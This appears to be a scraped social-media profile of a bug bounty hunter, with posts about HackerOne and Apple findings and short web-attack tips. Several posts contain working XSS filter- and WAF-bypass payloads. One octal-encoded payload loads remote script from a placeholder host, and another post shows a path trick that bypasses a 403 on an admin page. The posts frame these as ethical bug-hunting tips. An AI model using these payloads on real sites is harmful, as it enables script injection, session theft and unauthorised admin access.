One day, the technique for exploiting this vulnerability will be available. Not today, but one day.
Working with other bug hunters makes a huge difference. Two minds bouncing ideas off each other leads to peak efficiency.
Stealthy
143 posts
Stealthy
@stealthybugs
God is our refuge and strength, an ever-present help in trouble. - Psalm 46
- Check out my vulnerability write up about critical bugs in Apple infrastructure worth 36,000 in bounties. medium.com/@StealthyBugs/… #BugBounty #exploit #infosec #whitehat #bugbountytips #ethicalhacking
- Thought I'd share this remote code execution on one of the main sites for a large H1 target from a year ago. I found this one by being persistent and using Param Miner by @albinowax . After Param Miner discovered the header it was all manual testing to detect the template engine
- This bypasses a lot. <math><x xlink:href=javascript:confirm`1`>click #xss #bugbounty #bugbountytips #hackerone #infosec #brutexss #xssbypass #xsspayloads #exploit #hacking #hack #ethicalhacking #infosec #whitehat #security
- Improper access control edge case. /admin/index.jsp --> 403 /;/admin/index.jsp --> 200 #bugbounty #bugbountytips #hackerone #infosec #ethicalhacking #infosec #whitehat
- What is your highest bounty for an informative report? This one is from last year's h1-305 LHE.
- This is an interesting trick. Can confuse WAFs into thinking payload is an attribute value. <?tag x="-->" test="<img src=x onerror=alert(1)//"> #xss #bugbounty #bugbountytips #hackerone #infosec #xsspayloads #hacking #ethicalhacking #infosec #whitehat #security #xsspayloads
- Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600"
- Check out my vulnerability write up about a remote code execution bug on a public bug bounty program on HackerOne!! medium.com/@StealthyBugs/… #BugBounty #exploit #infosec #whitehat #bugbountytips #ethicalhacking
- Just exploited the hardest bug I've worked on yet. Took a total of two whole weeks and countless hours of pain to finally get the crit. Lessons? There is always a way. @Hacker0x01
- Check out this access control bug that exposed data in one of Apple's admin panels. medium.com/p/dbfb72c7e634 #BugBounty #exploit #infosec #whitehat #bugbountytips #ethicalhacking
- I am so happy and thankful to take home my first LHE trophy on @Hacker0x01. Executioner of #H1305 - most impactful report. I cannot disclose details but the bug is a cool one! Shout-out to all the friends I talked to and the new faces as well 💪😎 keep up the good work.
- Final solution to a stored XSS on a big program on HackerOne. Import any JS while bypassing uppercase in less than 60 characters. $["\147\145\164\123\143\162\151\160\164"]("//SITE.COM") This payload uses the JQuery function getScript in octal. Basically, I ran into a stored XSS
- Pop an alert with no letters and only 84 characters (not final solution but worth sharing character limit was 60). Thanks to @fransrosen for helping. (()=>{})["\143\157\156\163\164\162\165\143\164\157\162"]("\141\154\145\162\164()")() #xss #bugbounty #bugbountytips #hackerone
